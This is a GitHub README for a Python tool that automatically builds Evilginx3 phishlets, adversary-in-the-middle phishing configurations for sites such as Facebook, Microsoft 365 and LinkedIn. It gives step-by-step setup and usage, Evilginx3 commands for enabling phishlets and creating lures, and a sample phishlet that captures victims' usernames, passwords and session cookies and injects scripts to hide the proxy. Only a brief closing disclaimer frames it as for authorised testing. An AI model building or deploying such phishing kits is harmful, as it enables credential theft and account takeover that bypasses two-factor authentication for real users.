Skip to content

MomenAbuAssi/Phishlets-Build

Folders and files

NameName
Last commit message
Last commit date

Latest commit

Β 

History

6 Commits
Β 
Β 
Β 
Β 
Β 
Β 
Β 
Β 

Repository files navigation

README.md

β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—      β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•—  β–ˆβ–ˆβ•—
β•šβ•β•β–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—    β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•β•β•β•β•β•šβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β•
  β–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—  β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—   β•šβ–ˆβ–ˆβ–ˆβ•”β• 
 β–ˆβ–ˆβ–ˆβ•”β•  β–ˆβ–ˆβ•”β•β•β•  β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘    β–ˆβ–ˆβ•‘     β–ˆβ–ˆβ•‘   β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β•   β–ˆβ–ˆβ•”β–ˆβ–ˆβ•— 
β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘  β–ˆβ–ˆβ•‘β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•    β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β•šβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•—
β•šβ•β•β•β•β•β•β•β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β• β•šβ•β•β•β•β•β•      β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β• β•šβ•β•β•β•β•β•β•β•šβ•β•  β•šβ•β•

Phishlet Generator β€” Zero Codex Engine

Automated Evilginx3 phishlet builder powered by real browser automation

Python Playwright Evilginx3 License

Developer: Momen Abu Assi Β |Β  Project: ZeroCodeX


πŸ“– Overview

Zero Codex Phishlet Generator automates the creation of .yaml phishlet files for Evilginx3.

Instead of manually reverse-engineering a website's login flow, this tool:

  • Launches a real Chromium browser and navigates to the target site
  • Logs in with your test credentials to capture live network traffic
  • Automatically detects POST fields, session cookies, and auth tokens
  • Handles CAPTCHA and 2FA by pausing for manual resolution
  • Outputs a production-ready .yaml phishlet file

Supported targets include Facebook, LinkedIn, X/Twitter, Microsoft 365, Instagram, Spotify, OnlyFans, GitHub, Reddit, and any custom site.


✨ Key Features

Feature Description
πŸ€– Smart Field Classification Automatically separates credentials, dynamic tokens, and static force values
πŸͺ Cookie Harvesting Collects and stabilises session cookies after login
πŸ” CAPTCHA / 2FA Support Pauses indefinitely for manual challenge solving
🌐 Multi-step Login Handles email β†’ next β†’ password flows (Twitter, Microsoft)
πŸ›‘οΈ Anti-Detection Injects js_inject scripts to hide proxy indicators
🧹 Smart Filtering Removes noise domains, ad trackers, and irrelevant cookies
⚑ Auto domain mapping Detects required CDN and API subdomains automatically
πŸ“ YAML Serializer Generates clean, valid Evilginx3-compatible YAML

πŸ“‹ Requirements

Component Version
Python 3.7 or higher
pip Latest
Playwright + Chromium Via pip
Evilginx3 3.0.0 or higher

πŸ›  Installation

1. Clone the repository

git clone https://github.com/MomenAbuAssi/Phishlets-Build.git
cd Phishlets-Build

2. Install Python dependencies

pip install -r requirements.txt

requirements.txt

colorama
playwright
urllib3

3. Install Playwright browser

playwright install chromium

4. Install system dependencies (Linux only)

playwright install-deps chromium

πŸš€ Usage

python phishlet_generator.py

The tool guides you through interactive prompts:


Step-by-step walkthrough

πŸ”— Target URL

[?] Target URL: https://www.facebook.com/

Enter the real website you want to generate a phishlet for.

🌐 Fake Domain

[?] Fake domain (e.g. evil.com): your-domain.com

Your phishing domain β€” must be under your control and pointed to your Evilginx3 server.

🏷️ Phishlet Name

[?] Phishlet name [facebook]:

Press Enter to use the auto-detected name, or type a custom one.

πŸ–₯️ Headless Mode

[?] Headless? (y/N):
  • N (recommended) β€” visible browser window, allows manual CAPTCHA/2FA solving
  • y β€” background mode for servers (CAPTCHA cannot be solved manually)

πŸ”‘ Login Page

[?] Login page:
  1. Auto-detect (click login button)
  2. Provide direct login URL

Option 2 is recommended for most sites to skip the landing page.

πŸ§‘β€πŸ’» Real Account Mode

[?] Have account? (y/N): y
[?] Email/username: test@example.com
[?] Password:

Using a real account captures live POST traffic and session cookies, producing a complete phishlet.


▢️ What Happens Automatically

Phase 1: Navigation     β†’ Opens the login page
Phase 2: Login Flow     β†’ Fills credentials, submits, waits for result
Phase 3: Form Extract   β†’ Scans DOM for form fields and hidden tokens
Phase 4: Cookie Collect β†’ Harvests session cookies from all subdomains
Phase 5: Stabilisation  β†’ Waits for cookie jar to stabilise (up to 60s)
Build:   YAML Output    β†’ Generates the phishlet file

CAPTCHA / 2FA Handling

If a challenge appears, the script pauses automatically:

[!] CAPTCHA β€” solve it manually in the browser window.
[i] Script is waiting indefinitely...
[βœ“] CAPTCHA solved β€” continuing...

Solve the challenge in the open browser window β€” the script resumes on its own.


πŸ“¦ Output

[βœ“] Done (βœ… Real login).
[+] Building YAML...
════════════════════════════════════════════════════════════════
  βœ“  PHISHLET SAVED: phishlets/facebook.yaml
════════════════════════════════════════════════════════════════
  Mode        : βœ… Real login
  Proxy hosts : 6
  Auth tokens : 9
  Force POST  : 2 entries
  Auth URLs   : 2
  Credentials : user=email  pass=pass
  Login       : www.facebook.com/login/

The phishlet is saved in the phishlets/ folder (created automatically).


⚑ Evilginx3 Commands

After generating the phishlet:

phishlets load facebook
phishlets hostname facebook your-domain.com
phishlets enable facebook
lures create facebook

πŸ—οΈ Generated YAML Structure

name: 'facebook'
min_ver: '3.0.0'

proxy_hosts:
  - {phish_sub: 'www', orig_sub: 'www', domain: 'facebook.com',
     session: true, is_landing: true, auto_filter: true}

sub_filters:
  - {triggers_on: 'www.facebook.com', search: 'https://www.facebook.com',
     replace: 'https://{hostname}', mimes: ['text/html', ...]}

auth_tokens:
  - domain: '.facebook.com'
    keys: ["c_user", "xs", "fr", "datr", ".*,regexp"]

credentials:
  username: {key: 'email', search: '(.*)', type: 'post'}
  password: {key: 'pass',  search: '(.*)', type: 'post'}

auth_urls:
  - '/'
  - '/home.php'

login:
  domain: 'www.facebook.com'
  path: '/login/'

force_post:
  - path: '/api/graphql/'
    search:
      - {key: '__user', search: '(.*)'}
    force:
      - {key: '__ccg', value: 'GOOD'}
    type: 'post'

js_inject:
  - trigger_domains: ['www.facebook.com']
    trigger_paths: ['/login/', '/']
    script: |
      (function() {
        Object.defineProperty(document, 'domain', {
          get: function() { return 'facebook.com'; }
        });
      })();

🧰 Troubleshooting

Problem Solution
playwright not recognised Run pip install playwright then playwright install chromium
Script freezes on CAPTCHA Solve it manually in the browser β€” script resumes automatically
Login fails immediately Check credentials; script cannot bypass wrong passwords
No cookies collected Ensure Have account? y and login was fully successful
Page loads without styling CDN subdomains not proxied β€” run again with a stable connection
force_post: missing force field Evilginx version issue β€” add force: [] manually or upgrade Evilginx
Wrong login.path generated Use option 2 and provide the direct login URL manually

πŸ” How Field Classification Works

Every POST field captured during login is automatically classified:

Email / Password              β†’ search  (captured from victim)
Dynamic tokens (lsd, __s...)  β†’ search  (captured per-session)
remember_me, LoginOptions     β†’ force   (injected as fixed value)
debug, trace, request_id      β†’ ignored (noise)
Values longer than 20 chars   β†’ ignored (dynamic tokens/hashes)

Only 9 whitelisted keys can appear in force: remember_me, rememberme, keep_me_signed_in, stay_signed_in, persistent, loginoptions, remembermfa, __ccg, login


πŸ“ Project Structure

zero-codex-phishlet-generator/
β”œβ”€β”€ phishlet_generator.py          # Main script
β”œβ”€β”€ requirements.txt               # Python dependencies
β”œβ”€β”€ README.md                      # This file
β”œβ”€β”€ .gitignore                     # Ignore phishlets output
└── phishlets/                     # Generated YAML files (auto-created)
    β”œβ”€β”€ facebook.yaml
    β”œβ”€β”€ linkedin.yaml
    └── ...

⚠️ Legal Disclaimer

This tool is provided strictly for educational purposes and authorised penetration testing only.

  • You must have explicit written permission from the target organisation
  • Unauthorised use against real users or systems is illegal in most jurisdictions
  • The author assumes no liability for any misuse or damage caused

Use responsibly. Stay ethical.


πŸ“„ License

Zero Codex Engine β€” Phishlet Generator
Developer: Momen Abu Assi
For authorised security research and penetration testing only.

Zero Codex Engine β€” Built for security researchers

If this tool helped your research, consider giving it a ⭐

About

Build Phishlets profiles automatically and efficiently by logging into any website, registering cookies, and approving all the necessary data to create an excellent and ideal Phishlets profile.

Topics

Resources

Stars

6 stars

Watchers

0 watching

Forks

Releases

No releases published

Packages

 
 
 

Contributors

Languages